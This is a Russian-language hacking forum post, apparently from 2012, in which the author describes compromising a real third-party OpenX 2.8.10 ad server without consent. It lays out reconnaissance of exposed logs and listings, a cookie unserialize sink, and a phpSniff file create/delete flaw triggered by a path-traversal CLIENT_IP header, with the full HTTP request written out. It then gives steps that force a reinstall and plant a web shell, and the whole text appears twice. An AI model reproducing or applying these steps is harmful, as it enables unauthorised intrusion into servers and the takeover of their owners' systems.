XAMEHA
25.12.2012, 06:33
Во время посещения hostingkartinok.com - хостинга картинок, я наткнулся на сервер ***, предлагающий мне заработать денег. А почему бы не заработать?
Начинем зарабатывать:
*** - Apache/2.2.15 (CentOS) Server - PHP/5.3.3
Реф-ссылки:
http://***/ox/www/delivery/ck.php?oaparams=2__bannerid=46__zoneid=7__cb=0b76e 8e599__oadest=http%3A%2F%2Fwww.metod-deneg.com%2Fic%2Fhkart%2F%3Futm_source%3Dhostkart% 26utm_medium%3Dbanner%26utm_campaign%3Deuropa80
http://***/ic/hkart/?utm_source=hostkart&utm_medium=banner&utm_campaign=europa80
Серверная страница:
http://***/ - Apache 2 Test Page
OpenX Panel(Открывается при переходе на http://***/ox/):
http://***/ox/www/admin/index.php
http://***/ox/www/delivery/ - Мы имеем листинг файлов c указанием размера каждого файла, и мы можем попробовать найти эти скрипты в интернете, если это публичная партнерка и т.п.:
PHP:
[TXT]ac.php 12-Sep-2012 23:00 144K
[TXT]afr.php 12-Sep-2012 23:00 146K
[TXT]ag.php 12-Sep-2012 23:00 100K
[TXT]ai.php 12-Sep-2012 23:00 101K
[TXT]ajs.php 12-Sep-2012 23:00 146K
[TXT]al.php 12-Sep-2012 23:00 145K
[TXT]alocal.php 12-Sep-2012 23:00 145K
[TXT]apu.php 12-Sep-2012 23:00 146K
[TXT]avw.php 12-Sep-2012 23:00 144K
[TXT]ax.php 12-Sep-2012 23:00 145K
[TXT]axmlrpc.php 12-Sep-2012 23:00 158K
[TXT]ck.php 12-Sep-2012 23:00 106K
[TXT]crossdomain.xml 12-Sep-2012 23:00 199
[TXT]dxmlrpc.php 12-Sep-2012 23:00 101K
[TXT]fc.php 12-Sep-2012 23:00 2.9K
[TXT]fl.js 12-Sep-2012 23:00 6.5K
[TXT]lg.php 12-Sep-2012 23:00 105K
[TXT]robots.txt 12-Sep-2012 23:00 305
[TXT]spc.php 12-Sep-2012 23:00 145K
[TXT]spcjs.php 12-Sep-2012 23:00 105K
[TXT]ti.php 12-Sep-2012 23:00 101K
[TXT]tjs.php 12-Sep-2012 23:00 102K
[TXT]tv.php 12-Sep-2012 23:00 100K
http://***/ox/www/delivery/crossdomain.xml:
PHP:
robos.txt:
PHP:
# This robots.txt file requests that search engines and other
# automated web-agents don't try to index the files in thi s
# directory (/www/delivery/). This file is required in the
# event that you use OpenX with virtual do mains, and have one
# set up for the delivery interface.
User-agent: *
Disallow: /
На этом я начинаю догаыватся, что OpenX - не система управления сервером, как cPanel, а что-то другое. Скачиваем, только вот версию мы пока не знаем, однако файлы размещены 12-Sep-2012, и мы можем приблизительно выбрать нужную нам версию.
Находим инфу на рдоте и античате, однако скорее всего эксплоиты не актуальны:
https://rdot.org/forum/showthread.php?t=70
/threadnav150144-3-10.html
OpenX.org
И неразработанную уязвимость:
https://rdot.org/forum/showpost.php?p=27517&postcount=8
Нам нужно узнать версию. Так, заходим на http://download.openx.org/, имеем версии от 2012-05-08 и 2012-09-19, нам подходит первая. Скачиваем.
Уже лучше, у нас есть исходники. Сразу-же замечаем файл RELEASE_NOTES.txt.
Так: http://***/ox/RELEASE_NOTES.txt
What's New in OpenX 2.8.10
----------------------------
* Release date: 2012-09-12
Не угадали Скачиваем OpenX 2.8.10. У нас имеется последняя версия, похоже придется искать уязвимости самому.
Что мы имеем? Руки, сервер и 48,9 МБ исходников.
В некоторых файлах код очень кривой, значит где-то поблизости есть уязвимость:
Получение хоста:
PHP:
functionOX_getHostName()
{
if (!empty($_SERVER['HTTP_HOST'])) {
$host=explode(':',$_SERVER['HTTP_HOST']);
$host=$host[0];
} else if (!empty($_SERVER['SERVER_NAME'])) {
$host=explode(':',$_SERVER['SERVER_NAME']);
$host=$host[0];
}
return$host;
}
Примерно одинаковых 100 Кб функций находится практически во всех файлах. Попробуем найти моменты, где используется функция OX_getHostName():
PHP:
grep-rnw-i"OX_getHostName()"~/Загрузки/openx-2.8.10/
Вроде-бы ничего полезного нет, исходя из того, что версия PHP 5.3.3. Основная часть кривого кода распологается в OpenX/www/delivery, востанавливаем форматирование файлов с помощью http://beta.phpformatter.com/. Мгновение - и перед нами читабильный код.
Копаем дальше, находим логи:
http://***/ox/var/debug.log
http://***/ox/var/install.log
http://***/ox/var/cache/ - Полная папка с чем-то.
PHP:
Installation started 2012-10-23 03:19:13
Attempting to connect to database ox with u ser ox
Connected to database ox
Database settingsandpermissions are OK
creating upgrade_action audit table
successfully created upgrade_action audit tabl e
creating database_action audit table
successfully created database_action audit tab le
schema definition from cache TRUE
Installation created the core tables
Installation updated the schema version to 6 13
Installation updated the application version to 2.8.10
Preparing to set timezone preference...
Found timezone preference ID of 16
Found the admin account's timezone associatio n, updating preference...
Updated the admin account timezone preference to: 'Europe/Moscow'
Starting file-check for plugins...
Finished file-check for plugins
Starting file-check for plugins...
Finished file-check for plugins
Starting file-check for plugins...
Finished file-check for plugins
Имя БД: ox
Пользователь: ox
Пароля нет, но пробуем подключится удаленно:
PHP:
ERROR 1130(HY000):Host'**'is not allowed to c onnect to this MySQL server
Увы. Придется иследовать объемные исходники огромной CMS последней версии, делать больше нечего. N-Дней исследований дали свои труды. Сразу скажу, что я исследовал много файлов и писать обо всем не имеет смысла. Искать что-то в таком объеме файлов - полное безумие, и я решил попробовать найти что-то нестандартное с помощью grep.
PHP:
grep-rnw-i"unserialize"~/Загрузки/openx-2.8.10/
...
~/Загрузки/openx-2.8.10/www/delivery/ck.php:3156:$aVars=unserialize(stripslashes($_COOK IE[$conf['var']['vars']][$n]));
...
К истине уже ближе.
PHP:
functionMAX_querystringConvertParams()
{
$conf=$GLOBALS['_MAX']['CONF'];
$qs=$_SERVER['QUERY_STRING'];
$dest=false;
$destStr=$conf['var']['dest'] .'=';
$pos=strpos($qs,$destStr);
if ($pos===false) {
$destStr='dest=';
$pos=strpos($qs,$destStr);
}
if ($pos!==false) {
$dest=urldecode(substr($qs,$pos+strlen($destStr))) ;
$qs=substr($qs,0,$pos);
}
$aGet= array();
$paramStr=$conf['var']['params'] .'=';
$paramPos=strpos($qs,$paramStr);
if (is_numeric($paramPos)) {
$qs=urldecode(substr($qs,$paramPos+strlen($paramSt r)));
$delim=$qs{0};
if (is_numeric($delim)) {
$delim=substr($qs,1,$delim);
}
$qs=substr($qs,strlen($delim) +1);
MAX_querystringParseStr($qs,$aGet,$delim);
$qPos= isset($aGet[$conf['var']['dest']]) ?strpos($aGet[$conf['var']['dest']],'?') :false;
$aPos= isset($aGet[$conf['var']['dest']]) ?strpos($aGet[$conf['var']['dest']],'&') :false;
if ($aPos&& !$qPos) {
$desturl=substr($aGet[$conf['var']['dest']],0,$aPos);
$destparams=substr($aGet[$conf['var']['dest']],$aPos+1);
$aGet[$conf['var']['dest']] =$desturl.'?'.$destparams;
}
} else {
parse_str($qs,$aGet);
}
if ($dest!==false) {
$aGet[$conf['var']['dest']] =$dest;
}
$n= isset($_GET[$conf['var']['n']]) ?$_GET[$conf['var']['n']] :'';
if (empty($n)) {
$n= isset($aGet[$conf['var']['n']]) ?$aGet[$conf['var']['n']] :'';
}
if (!empty($n) && !empty($_COOKIE[$conf['var']['vars']][$n])) {
$aVars=unserialize(stripslashes($_COOKIE[$conf['var']['vars']][$n]));
foreach ($aVarsas$name=>$value) {
if (!isset($_GET[$name])) {
$aGet[$name] =$value;
}
}
}
$_GET=$aGet;
$_REQUEST=$_GET+$_POST+$_COOKIE;
}
?>
Параметр проходит через stripslashes, и проблем с магическими кавычками быть не должно, в крайнем случае можно самим наслешировать параметр.
Если мы отправим _GET[n]=data, то мы можем прогнать через unserialize значение куков OAVARS[data], но при условии, что OAVARS в конфиге не изменено.
Чем это нам поможит? Попробуйте выполнить этот код:
PHP:
foo;
}
}
$s='O:9:"someClass":1:{s:3:"foo";s:4:"abcd";}';
$u=unserialize($s);
?>
Он выведет abcd, а без unserialize ничего не выведет. Выполняем print_r(get_declared_classes()) - сейчас у нас подключен только phpSniff. Стоп, а что за phpSniff?
phpSniff Располагается в /plugins/deliveryLimitations/Client/lib/phpSniff/, при этом он распаковывается позже, а не нахоится там сразу-же в стандартных исходниках.
Если мы исследуем OpenX, то мы будем исслеовать и phpSniff.
index.php:
PHP:
$GET_VARS['cc'],
'default_language'=>$GET_VARS['dl'],
'allow_masquerading'=>$GET_VARS['am']);
$client=& newphpSniff($GET_VARS['UA'],$sniffer_settings);
?>
phpSniff:
PHP:
_check_cookies=$check_cookies;
$this->_default_language=$default_language;
$this->_allow_masquerading=$allow_masquerading;
} else {
// for backwards compatibility with 2.0.x seri es
$run= (bool)$settings;
}
?>
IP:
PHP:
_set_browser('ip',$ip);
}
?>
И самое главное:
PHP:
_check_cookies)
{$fp= @fopen($this->_temp_file_path.$this->property('ip'),'r');//var $_temp_file_path = '/tmp/'; // with trailing slash
if(!$fp)
{$fp= @fopen($this->_temp_file_path.$this->property('ip'),'a');
// make sure we have a valid file pointer
if($fp) {
fclose($fp);
setcookie('phpSniff_session','ss',0,'/');
setcookie('phpSniff_stored','st',time()+3600*24*36 5,'/');
$QS=getenv('QUERY_STRING');
$script_path=getenv('PATH_INFO')?getenv('PATH_INFO '):getenv('SCRIPT_NAME');
if(is_inte ger($pos=strpos(strrev($script_path),"php.xedni/"))&&!$pos) {
$script_path=strrev(substr(strrev($script_path),9) );
}
}
$location='http://'.getenv('SERVER_NAME').$script_path.($QS==''?'':' ?'.$QS);
header("Location:$location");
exit;
} elseif($fp) {
// we only want to proceed if we have a fi le pointer
unlink($this->_temp_file_path.$this->property('ip'));
fclose($fp);
$this->_set_browser('ss_cookies',isset($cookies['phpSniff_session'])?'true':'false');
$this->_set_browser('st_cookies',isset($cookies['phpSniff_stored'])?'true':'false');
// delete the old cookies
setcookie('phpSniff_session','',0,'/');
setcookie('phpSniff_stored','',0,'/');
}
}
}
?>
Мы можем создавать пустые файлы на сервере, а так-же удалять то, что нам нужно:
PHP:
//Если файл не существует - он создается, иначе - удаляется
GET/openx-2.8.10/plugins/deliveryLimitations/Client/lib/phpSniff/index.php?cc=asdf HTTP/1.1
Host:127.0.0.1
User-Agent:IE
Accept:text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: ru-RU,ru;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
CLIENT_IP: /../tmp/path
Cache-Control: max-age=0
Теперь нам нужно раскртие пути, в phpSniff установлено E_ALL(index.php?UA[]), только вот display_errors на удаленном сервере похоже что off.
Хитрим:
PHP:
grep-rnw-i"display_errors"*/openx-2.8.10/
*/openx-2.8.10/www/admin/plugins/openXWorkflow/application/bootstrap.php:6:ini_set('display_errors',1);
Имеется раскрытие пути, смотрим путь - http://***/ox/www/admin/plugins/openXWorkflow/application/bootstrap.php
Имеем /home/ox/
Остается только удалить что-то полезное, что даст нам переустановить OpenX и залить шелл, возможно успев сохранить конфиг т.е. не приченяя вред ресурсу.
Файл /home/ox/var/INSTALLED отвечает за это, однако удалить его оказалось недостаточно.
Firefox определил, что сервер перенаправляет запрос на этот адрес таким образом, что он никогда не завершится.
Теперь, ВНИМАНИЕ, что бы запустить инсталяцию следует:
Удалить файл INSTALLED
Создать файл UPGRADE
Удалить файл default.conf.php
В нем находится:
PHP:
;
;*** DO NOT REMOVE THE LINE ABOVE ***
realConfig="127.0.0.1"
Прописать в hosts: *.*.*.* asdf
Перейти на http://asdf/path/to/openX/install.php?action=welcome
Если вдруг во время переустановки у вас не хватит прав на каталоги , можно вернуть всё обратно по этой-же инструкции, + подложив за место default.conf.php пустой файл.
Идем дальше, нам необходимо создать базу MySQL, только вот к этому хосту мы не имеем доступа, и нам придется указывать наш удаленный хост, только не забудте права обрезать
Перекачка данных на базу займет длительный объем времени.
Совершаем действие в ещё нескольких пунктах, минута и мы в админке.
Заливаем шелл по этой инструкции от (dm) - /showpost.php?p=1629085&postcount=2
Чистим каталог var, где находится asdf.conf.php, а вот главный конфиг остается незатертым.
Начинем зарабатывать:
*** - Apache/2.2.15 (CentOS) Server - PHP/5.3.3
Реф-ссылки:
http://***/ox/www/delivery/ck.php?oaparams=2__bannerid=46__zoneid=7__cb=0b76e 8e599__oadest=http%3A%2F%2Fwww.metod-deneg.com%2Fic%2Fhkart%2F%3Futm_source%3Dhostkart% 26utm_medium%3Dbanner%26utm_campaign%3Deuropa80
http://***/ic/hkart/?utm_source=hostkart&utm_medium=banner&utm_campaign=europa80
Серверная страница:
http://***/ - Apache 2 Test Page
OpenX Panel(Открывается при переходе на http://***/ox/):
http://***/ox/www/admin/index.php
http://***/ox/www/delivery/ - Мы имеем листинг файлов c указанием размера каждого файла, и мы можем попробовать найти эти скрипты в интернете, если это публичная партнерка и т.п.:
PHP:
[TXT]ac.php 12-Sep-2012 23:00 144K
[TXT]afr.php 12-Sep-2012 23:00 146K
[TXT]ag.php 12-Sep-2012 23:00 100K
[TXT]ai.php 12-Sep-2012 23:00 101K
[TXT]ajs.php 12-Sep-2012 23:00 146K
[TXT]al.php 12-Sep-2012 23:00 145K
[TXT]alocal.php 12-Sep-2012 23:00 145K
[TXT]apu.php 12-Sep-2012 23:00 146K
[TXT]avw.php 12-Sep-2012 23:00 144K
[TXT]ax.php 12-Sep-2012 23:00 145K
[TXT]axmlrpc.php 12-Sep-2012 23:00 158K
[TXT]ck.php 12-Sep-2012 23:00 106K
[TXT]crossdomain.xml 12-Sep-2012 23:00 199
[TXT]dxmlrpc.php 12-Sep-2012 23:00 101K
[TXT]fc.php 12-Sep-2012 23:00 2.9K
[TXT]fl.js 12-Sep-2012 23:00 6.5K
[TXT]lg.php 12-Sep-2012 23:00 105K
[TXT]robots.txt 12-Sep-2012 23:00 305
[TXT]spc.php 12-Sep-2012 23:00 145K
[TXT]spcjs.php 12-Sep-2012 23:00 105K
[TXT]ti.php 12-Sep-2012 23:00 101K
[TXT]tjs.php 12-Sep-2012 23:00 102K
[TXT]tv.php 12-Sep-2012 23:00 100K
http://***/ox/www/delivery/crossdomain.xml:
PHP:
robos.txt:
PHP:
# This robots.txt file requests that search engines and other
# automated web-agents don't try to index the files in thi s
# directory (/www/delivery/). This file is required in the
# event that you use OpenX with virtual do mains, and have one
# set up for the delivery interface.
User-agent: *
Disallow: /
На этом я начинаю догаыватся, что OpenX - не система управления сервером, как cPanel, а что-то другое. Скачиваем, только вот версию мы пока не знаем, однако файлы размещены 12-Sep-2012, и мы можем приблизительно выбрать нужную нам версию.
Находим инфу на рдоте и античате, однако скорее всего эксплоиты не актуальны:
https://rdot.org/forum/showthread.php?t=70
/threadnav150144-3-10.html
OpenX.org
И неразработанную уязвимость:
https://rdot.org/forum/showpost.php?p=27517&postcount=8
Нам нужно узнать версию. Так, заходим на http://download.openx.org/, имеем версии от 2012-05-08 и 2012-09-19, нам подходит первая. Скачиваем.
Уже лучше, у нас есть исходники. Сразу-же замечаем файл RELEASE_NOTES.txt.
Так: http://***/ox/RELEASE_NOTES.txt
What's New in OpenX 2.8.10
----------------------------
* Release date: 2012-09-12
Не угадали Скачиваем OpenX 2.8.10. У нас имеется последняя версия, похоже придется искать уязвимости самому.
Что мы имеем? Руки, сервер и 48,9 МБ исходников.
В некоторых файлах код очень кривой, значит где-то поблизости есть уязвимость:
Получение хоста:
PHP:
functionOX_getHostName()
{
if (!empty($_SERVER['HTTP_HOST'])) {
$host=explode(':',$_SERVER['HTTP_HOST']);
$host=$host[0];
} else if (!empty($_SERVER['SERVER_NAME'])) {
$host=explode(':',$_SERVER['SERVER_NAME']);
$host=$host[0];
}
return$host;
}
Примерно одинаковых 100 Кб функций находится практически во всех файлах. Попробуем найти моменты, где используется функция OX_getHostName():
PHP:
grep-rnw-i"OX_getHostName()"~/Загрузки/openx-2.8.10/
Вроде-бы ничего полезного нет, исходя из того, что версия PHP 5.3.3. Основная часть кривого кода распологается в OpenX/www/delivery, востанавливаем форматирование файлов с помощью http://beta.phpformatter.com/. Мгновение - и перед нами читабильный код.
Копаем дальше, находим логи:
http://***/ox/var/debug.log
http://***/ox/var/install.log
http://***/ox/var/cache/ - Полная папка с чем-то.
PHP:
Installation started 2012-10-23 03:19:13
Attempting to connect to database ox with u ser ox
Connected to database ox
Database settingsandpermissions are OK
creating upgrade_action audit table
successfully created upgrade_action audit tabl e
creating database_action audit table
successfully created database_action audit tab le
schema definition from cache TRUE
Installation created the core tables
Installation updated the schema version to 6 13
Installation updated the application version to 2.8.10
Preparing to set timezone preference...
Found timezone preference ID of 16
Found the admin account's timezone associatio n, updating preference...
Updated the admin account timezone preference to: 'Europe/Moscow'
Starting file-check for plugins...
Finished file-check for plugins
Starting file-check for plugins...
Finished file-check for plugins
Starting file-check for plugins...
Finished file-check for plugins
Имя БД: ox
Пользователь: ox
Пароля нет, но пробуем подключится удаленно:
PHP:
ERROR 1130(HY000):Host'**'is not allowed to c onnect to this MySQL server
Увы. Придется иследовать объемные исходники огромной CMS последней версии, делать больше нечего. N-Дней исследований дали свои труды. Сразу скажу, что я исследовал много файлов и писать обо всем не имеет смысла. Искать что-то в таком объеме файлов - полное безумие, и я решил попробовать найти что-то нестандартное с помощью grep.
PHP:
grep-rnw-i"unserialize"~/Загрузки/openx-2.8.10/
...
~/Загрузки/openx-2.8.10/www/delivery/ck.php:3156:$aVars=unserialize(stripslashes($_COOK IE[$conf['var']['vars']][$n]));
...
К истине уже ближе.
PHP:
functionMAX_querystringConvertParams()
{
$conf=$GLOBALS['_MAX']['CONF'];
$qs=$_SERVER['QUERY_STRING'];
$dest=false;
$destStr=$conf['var']['dest'] .'=';
$pos=strpos($qs,$destStr);
if ($pos===false) {
$destStr='dest=';
$pos=strpos($qs,$destStr);
}
if ($pos!==false) {
$dest=urldecode(substr($qs,$pos+strlen($destStr))) ;
$qs=substr($qs,0,$pos);
}
$aGet= array();
$paramStr=$conf['var']['params'] .'=';
$paramPos=strpos($qs,$paramStr);
if (is_numeric($paramPos)) {
$qs=urldecode(substr($qs,$paramPos+strlen($paramSt r)));
$delim=$qs{0};
if (is_numeric($delim)) {
$delim=substr($qs,1,$delim);
}
$qs=substr($qs,strlen($delim) +1);
MAX_querystringParseStr($qs,$aGet,$delim);
$qPos= isset($aGet[$conf['var']['dest']]) ?strpos($aGet[$conf['var']['dest']],'?') :false;
$aPos= isset($aGet[$conf['var']['dest']]) ?strpos($aGet[$conf['var']['dest']],'&') :false;
if ($aPos&& !$qPos) {
$desturl=substr($aGet[$conf['var']['dest']],0,$aPos);
$destparams=substr($aGet[$conf['var']['dest']],$aPos+1);
$aGet[$conf['var']['dest']] =$desturl.'?'.$destparams;
}
} else {
parse_str($qs,$aGet);
}
if ($dest!==false) {
$aGet[$conf['var']['dest']] =$dest;
}
$n= isset($_GET[$conf['var']['n']]) ?$_GET[$conf['var']['n']] :'';
if (empty($n)) {
$n= isset($aGet[$conf['var']['n']]) ?$aGet[$conf['var']['n']] :'';
}
if (!empty($n) && !empty($_COOKIE[$conf['var']['vars']][$n])) {
$aVars=unserialize(stripslashes($_COOKIE[$conf['var']['vars']][$n]));
foreach ($aVarsas$name=>$value) {
if (!isset($_GET[$name])) {
$aGet[$name] =$value;
}
}
}
$_GET=$aGet;
$_REQUEST=$_GET+$_POST+$_COOKIE;
}
?>
Параметр проходит через stripslashes, и проблем с магическими кавычками быть не должно, в крайнем случае можно самим наслешировать параметр.
Если мы отправим _GET[n]=data, то мы можем прогнать через unserialize значение куков OAVARS[data], но при условии, что OAVARS в конфиге не изменено.
Чем это нам поможит? Попробуйте выполнить этот код:
PHP:
foo;
}
}
$s='O:9:"someClass":1:{s:3:"foo";s:4:"abcd";}';
$u=unserialize($s);
?>
Он выведет abcd, а без unserialize ничего не выведет. Выполняем print_r(get_declared_classes()) - сейчас у нас подключен только phpSniff. Стоп, а что за phpSniff?
phpSniff Располагается в /plugins/deliveryLimitations/Client/lib/phpSniff/, при этом он распаковывается позже, а не нахоится там сразу-же в стандартных исходниках.
Если мы исследуем OpenX, то мы будем исслеовать и phpSniff.
index.php:
PHP:
$GET_VARS['cc'],
'default_language'=>$GET_VARS['dl'],
'allow_masquerading'=>$GET_VARS['am']);
$client=& newphpSniff($GET_VARS['UA'],$sniffer_settings);
?>
phpSniff:
PHP:
_check_cookies=$check_cookies;
$this->_default_language=$default_language;
$this->_allow_masquerading=$allow_masquerading;
} else {
// for backwards compatibility with 2.0.x seri es
$run= (bool)$settings;
}
?>
IP:
PHP:
_set_browser('ip',$ip);
}
?>
И самое главное:
PHP:
_check_cookies)
{$fp= @fopen($this->_temp_file_path.$this->property('ip'),'r');//var $_temp_file_path = '/tmp/'; // with trailing slash
if(!$fp)
{$fp= @fopen($this->_temp_file_path.$this->property('ip'),'a');
// make sure we have a valid file pointer
if($fp) {
fclose($fp);
setcookie('phpSniff_session','ss',0,'/');
setcookie('phpSniff_stored','st',time()+3600*24*36 5,'/');
$QS=getenv('QUERY_STRING');
$script_path=getenv('PATH_INFO')?getenv('PATH_INFO '):getenv('SCRIPT_NAME');
if(is_inte ger($pos=strpos(strrev($script_path),"php.xedni/"))&&!$pos) {
$script_path=strrev(substr(strrev($script_path),9) );
}
}
$location='http://'.getenv('SERVER_NAME').$script_path.($QS==''?'':' ?'.$QS);
header("Location:$location");
exit;
} elseif($fp) {
// we only want to proceed if we have a fi le pointer
unlink($this->_temp_file_path.$this->property('ip'));
fclose($fp);
$this->_set_browser('ss_cookies',isset($cookies['phpSniff_session'])?'true':'false');
$this->_set_browser('st_cookies',isset($cookies['phpSniff_stored'])?'true':'false');
// delete the old cookies
setcookie('phpSniff_session','',0,'/');
setcookie('phpSniff_stored','',0,'/');
}
}
}
?>
Мы можем создавать пустые файлы на сервере, а так-же удалять то, что нам нужно:
PHP:
//Если файл не существует - он создается, иначе - удаляется
GET/openx-2.8.10/plugins/deliveryLimitations/Client/lib/phpSniff/index.php?cc=asdf HTTP/1.1
Host:127.0.0.1
User-Agent:IE
Accept:text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: ru-RU,ru;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
CLIENT_IP: /../tmp/path
Cache-Control: max-age=0
Теперь нам нужно раскртие пути, в phpSniff установлено E_ALL(index.php?UA[]), только вот display_errors на удаленном сервере похоже что off.
Хитрим:
PHP:
grep-rnw-i"display_errors"*/openx-2.8.10/
*/openx-2.8.10/www/admin/plugins/openXWorkflow/application/bootstrap.php:6:ini_set('display_errors',1);
Имеется раскрытие пути, смотрим путь - http://***/ox/www/admin/plugins/openXWorkflow/application/bootstrap.php
Имеем /home/ox/
Остается только удалить что-то полезное, что даст нам переустановить OpenX и залить шелл, возможно успев сохранить конфиг т.е. не приченяя вред ресурсу.
Файл /home/ox/var/INSTALLED отвечает за это, однако удалить его оказалось недостаточно.
Firefox определил, что сервер перенаправляет запрос на этот адрес таким образом, что он никогда не завершится.
Теперь, ВНИМАНИЕ, что бы запустить инсталяцию следует:
Удалить файл INSTALLED
Создать файл UPGRADE
Удалить файл default.conf.php
В нем находится:
PHP:
;
;*** DO NOT REMOVE THE LINE ABOVE ***
realConfig="127.0.0.1"
Прописать в hosts: *.*.*.* asdf
Перейти на http://asdf/path/to/openX/install.php?action=welcome
Если вдруг во время переустановки у вас не хватит прав на каталоги , можно вернуть всё обратно по этой-же инструкции, + подложив за место default.conf.php пустой файл.
Идем дальше, нам необходимо создать базу MySQL, только вот к этому хосту мы не имеем доступа, и нам придется указывать наш удаленный хост, только не забудте права обрезать
Перекачка данных на базу займет длительный объем времени.
Совершаем действие в ещё нескольких пунктах, минута и мы в админке.
Заливаем шелл по этой инструкции от (dm) - /showpost.php?p=1629085&postcount=2
Чистим каталог var, где находится asdf.conf.php, а вот главный конфиг остается незатертым.